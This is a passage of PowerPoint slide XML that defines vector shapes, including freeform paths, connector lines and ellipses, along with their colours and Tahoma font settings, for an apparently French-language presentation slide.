                <a:gd name="T12" fmla="*/ 1 w 144"/>
                <a:gd name="T13" fmla="*/ 46 h 97"/>
                <a:gd name="T14" fmla="*/ 0 w 144"/>
                <a:gd name="T15" fmla="*/ 46 h 97"/>
                <a:gd name="T16" fmla="*/ 0 w 144"/>
                <a:gd name="T17" fmla="*/ 66 h 97"/>
                <a:gd name="T18" fmla="*/ 8 w 144"/>
                <a:gd name="T19" fmla="*/ 66 h 97"/>
                <a:gd name="T20" fmla="*/ 67 w 144"/>
                <a:gd name="T21" fmla="*/ 97 h 97"/>
                <a:gd name="T22" fmla="*/ 78 w 144"/>
                <a:gd name="T23" fmla="*/ 97 h 97"/>
                <a:gd name="T24" fmla="*/ 136 w 144"/>
                <a:gd name="T25" fmla="*/ 66 h 97"/>
                <a:gd name="T26" fmla="*/ 144 w 144"/>
                <a:gd name="T27" fmla="*/ 66 h 97"/>
                <a:gd name="T28" fmla="*/ 144 w 144"/>
                <a:gd name="T29" fmla="*/ 46 h 97"/>
                <a:gd name="T30" fmla="*/ 143 w 144"/>
                <a:gd name="T31" fmla="*/ 46 h 97"/>
                <a:gd name="T32" fmla="*/ 143 w 144"/>
                <a:gd name="T33" fmla="*/ 44 h 97"/>
                <a:gd name="T34" fmla="*/ 144 w 144"/>
                <a:gd name="T35" fmla="*/ 44 h 97"/>
                <a:gd name="T36" fmla="*/ 144 w 144"/>
                <a:gd name="T37" fmla="*/ 24 h 97"/>
                <a:gd name="T38" fmla="*/ 144 w 144"/>
                <a:gd name="T39" fmla="*/ 22 h 97"/>
                <a:gd name="T40" fmla="*/ 144 w 144"/>
                <a:gd name="T41" fmla="*/ 2 h 97"/>
                <a:gd name="T42" fmla="*/ 144 w 144"/>
                <a:gd name="T43" fmla="*/ 0 h 97"/>
                <a:gd name="T44" fmla="*/ 143 w 144"/>
                <a:gd name="T45" fmla="*/ 0 h 97"/>
                <a:gd name="T46" fmla="*/ 1 w 144"/>
                <a:gd name="T47" fmla="*/ 0 h 97"/>
                <a:gd name="T48" fmla="*/ 0 w 144"/>
                <a:gd name="T4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97">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24"/>
                    <a:pt x="0" y="24"/>
                    <a:pt x="0" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="44"/>
                    <a:pt x="1" y="44"/>
                    <a:pt x="1" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="45"/>
                    <a:pt x="1" y="46"/>
                    <a:pt x="1" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="46"/>
                    <a:pt x="0" y="46"/>
                    <a:pt x="0" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="66"/>
                    <a:pt x="8" y="66"/>
                    <a:pt x="8" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="84"/>
                    <a:pt x="41" y="97"/>
                    <a:pt x="67" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="97"/>
                    <a:pt x="78" y="97"/>
                    <a:pt x="78" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="97"/>
                    <a:pt x="125" y="84"/>
                    <a:pt x="136" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="66"/>
                    <a:pt x="144" y="66"/>
                    <a:pt x="144" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="46"/>
                    <a:pt x="144" y="46"/>
                    <a:pt x="144" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="46"/>
                    <a:pt x="143" y="46"/>
                    <a:pt x="143" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="46"/>
                    <a:pt x="143" y="45"/>
                    <a:pt x="143" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="44"/>
                    <a:pt x="144" y="44"/>
                    <a:pt x="144" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="24"/>
                    <a:pt x="144" y="24"/>
                    <a:pt x="144" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="22"/>
                    <a:pt x="144" y="22"/>
                    <a:pt x="144" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="2"/>
                    <a:pt x="144" y="2"/>
                    <a:pt x="144" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="0"/>
                    <a:pt x="144" y="0"/>
                    <a:pt x="144" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="143" y="0"/>
                    <a:pt x="143" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Freeform 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382E562C-ED58-4281-8611-FFA53358F7F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5470258" y="5477875"/>
              <a:ext cx="1031919" cy="123831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 164"/>
                <a:gd name="T1" fmla="*/ 20 h 20"/>
                <a:gd name="T2" fmla="*/ 164 w 164"/>
                <a:gd name="T3" fmla="*/ 10 h 20"/>
                <a:gd name="T4" fmla="*/ 155 w 164"/>
                <a:gd name="T5" fmla="*/ 0 h 20"/>
                <a:gd name="T6" fmla="*/ 154 w 164"/>
                <a:gd name="T7" fmla="*/ 0 h 20"/>
                <a:gd name="T8" fmla="*/ 10 w 164"/>
                <a:gd name="T9" fmla="*/ 0 h 20"/>
                <a:gd name="T10" fmla="*/ 9 w 164"/>
                <a:gd name="T11" fmla="*/ 0 h 20"/>
                <a:gd name="T12" fmla="*/ 0 w 164"/>
                <a:gd name="T13" fmla="*/ 10 h 20"/>
                <a:gd name="T14" fmla="*/ 9 w 164"/>
                <a:gd name="T15" fmla="*/ 20 h 20"/>
                <a:gd name="T16" fmla="*/ 10 w 164"/>
                <a:gd name="T17" fmla="*/ 20 h 20"/>
                <a:gd name="T18" fmla="*/ 154 w 164"/>
                <a:gd name="T19" fmla="*/ 20 h 20"/>
                <a:gd name="T20" fmla="*/ 155 w 164"/>
                <a:gd name="T2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
                  <a:moveTo>
                    <a:pt x="155" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="20"/>
                    <a:pt x="164" y="16"/>
                    <a:pt x="164" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="5"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="155" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="154" y="0"/>
                    <a:pt x="154" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16"/>
                    <a:pt x="4" y="20"/>
                    <a:pt x="9" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="20"/>
                    <a:pt x="10" y="20"/>
                    <a:pt x="10" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="20"/>
                    <a:pt x="154" y="20"/>
                    <a:pt x="154" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="20"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 100">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A21F97-6189-4FB4-B6DB-2706C70FB1FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5470258" y="5617185"/>
              <a:ext cx="1031919" cy="123831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 164 w 164"/>
                <a:gd name="T1" fmla="*/ 10 h 20"/>
                <a:gd name="T2" fmla="*/ 155 w 164"/>
                <a:gd name="T3" fmla="*/ 0 h 20"/>
                <a:gd name="T4" fmla="*/ 154 w 164"/>
                <a:gd name="T5" fmla="*/ 0 h 20"/>
                <a:gd name="T6" fmla="*/ 10 w 164"/>
                <a:gd name="T7" fmla="*/ 0 h 20"/>
                <a:gd name="T8" fmla="*/ 9 w 164"/>
                <a:gd name="T9" fmla="*/ 0 h 20"/>
                <a:gd name="T10" fmla="*/ 0 w 164"/>
                <a:gd name="T11" fmla="*/ 10 h 20"/>
                <a:gd name="T12" fmla="*/ 9 w 164"/>
                <a:gd name="T13" fmla="*/ 20 h 20"/>
                <a:gd name="T14" fmla="*/ 11 w 164"/>
                <a:gd name="T15" fmla="*/ 20 h 20"/>
                <a:gd name="T16" fmla="*/ 153 w 164"/>
                <a:gd name="T17" fmla="*/ 20 h 20"/>
                <a:gd name="T18" fmla="*/ 155 w 164"/>
                <a:gd name="T19" fmla="*/ 20 h 20"/>
                <a:gd name="T20" fmla="*/ 164 w 164"/>
                <a:gd name="T2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
                  <a:moveTo>
                    <a:pt x="164" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="5"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="155" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="154" y="0"/>
                    <a:pt x="154" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="9" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16"/>
                    <a:pt x="4" y="20"/>
                    <a:pt x="9" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="20"/>
                    <a:pt x="11" y="20"/>
                    <a:pt x="11" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="20"/>
                    <a:pt x="153" y="20"/>
                    <a:pt x="153" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="20"/>
                    <a:pt x="155" y="20"/>
                    <a:pt x="155" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="20"/>
                    <a:pt x="164" y="16"/>
                    <a:pt x="164" y="10"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F2DA69D-1CD6-4F36-A9E3-B6469A232200}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5470258" y="5756494"/>
              <a:ext cx="1031919" cy="123831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 9 w 164"/>
                <a:gd name="T1" fmla="*/ 0 h 20"/>
                <a:gd name="T2" fmla="*/ 0 w 164"/>
                <a:gd name="T3" fmla="*/ 10 h 20"/>
                <a:gd name="T4" fmla="*/ 9 w 164"/>
                <a:gd name="T5" fmla="*/ 20 h 20"/>
                <a:gd name="T6" fmla="*/ 18 w 164"/>
                <a:gd name="T7" fmla="*/ 20 h 20"/>
                <a:gd name="T8" fmla="*/ 146 w 164"/>
                <a:gd name="T9" fmla="*/ 20 h 20"/>
                <a:gd name="T10" fmla="*/ 155 w 164"/>
                <a:gd name="T11" fmla="*/ 20 h 20"/>
                <a:gd name="T12" fmla="*/ 164 w 164"/>
                <a:gd name="T13" fmla="*/ 10 h 20"/>
                <a:gd name="T14" fmla="*/ 155 w 164"/>
                <a:gd name="T15" fmla="*/ 0 h 20"/>
                <a:gd name="T16" fmla="*/ 153 w 164"/>
                <a:gd name="T17" fmla="*/ 0 h 20"/>
                <a:gd name="T18" fmla="*/ 11 w 164"/>
                <a:gd name="T19" fmla="*/ 0 h 20"/>
                <a:gd name="T20" fmla="*/ 9 w 164"/>
                <a:gd name="T2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4" h="20">
                  <a:moveTo>
                    <a:pt x="9" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="0" y="5"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15"/>
                    <a:pt x="4" y="20"/>
                    <a:pt x="9" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="20"/>
                    <a:pt x="18" y="20"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="20"/>
                    <a:pt x="146" y="20"/>
                    <a:pt x="146" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="20"/>
                    <a:pt x="155" y="20"/>
                    <a:pt x="155" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="20"/>
                    <a:pt x="164" y="15"/>
                    <a:pt x="164" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="5"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="155" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="0"/>
                    <a:pt x="153" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>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Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Forme libre : forme 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A572C85B-15D7-4A38-9DB4-11896D4EFA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3937508" y="4863606"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 116205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1162050" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="127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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Connecteur droit 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617C08D9-D9B3-41FA-9EF2-6D61C520C4B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3928873" y="3726914"/>
            <a:ext cx="626589" cy="1525"/>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24" name="Forme libre : forme 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{246ABE4E-359A-42B9-8112-E8FE6779BD5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937508" y="2082306"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 116205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1162050" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="127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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Ellipse 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E32A671-FA2C-41A7-BD79-924E570C7B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208873" y="1724613"/>
            <a:ext cx="720000" cy="7200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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="AutoShape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AFFDAE7-3637-494E-A8BA-E98A6312BE5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3386701" y="5179771"/>
            <a:ext cx="364345" cy="36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4A4A4A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Ellipse 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C1D262-655E-4053-802C-BB2CD2A997A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208873" y="5001213"/>
            <a:ext cx="720000" cy="7200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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Ellipse 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37316C6-E019-4A46-94DC-A1DB2F472EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208873" y="3367676"/>
            <a:ext cx="720000" cy="7200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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Forme libre : forme 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA9AEB90-7880-47A4-8FBB-A2C0F4E4B409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7074949" y="4863606"/>
            <a:ext cx="1162050" cy="495300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1162050"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX1" fmla="*/ 679450 w 1162050"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 495300"/>
              <a:gd name="connsiteX2" fmla="*/ 1162050 w 1162050"/>
              <a:gd name="connsiteY2" fmla="*/ 495300 h 495300"/>
              <a:gd name="connsiteX3" fmla="*/ 1162050 w 116205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1162050" h="495300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="679450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162050" y="495300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="127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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="Connecteur droit 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6185D519-5E3D-4177-B708-AD8437E86843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="74" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7610411" y="3727676"/>
            <a:ext cx="646712" cy="763"/>
          </a:xfrm>
          <a:prstGeom prst="line">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57" name="Forme libre : forme 26">
            <a:extLst>
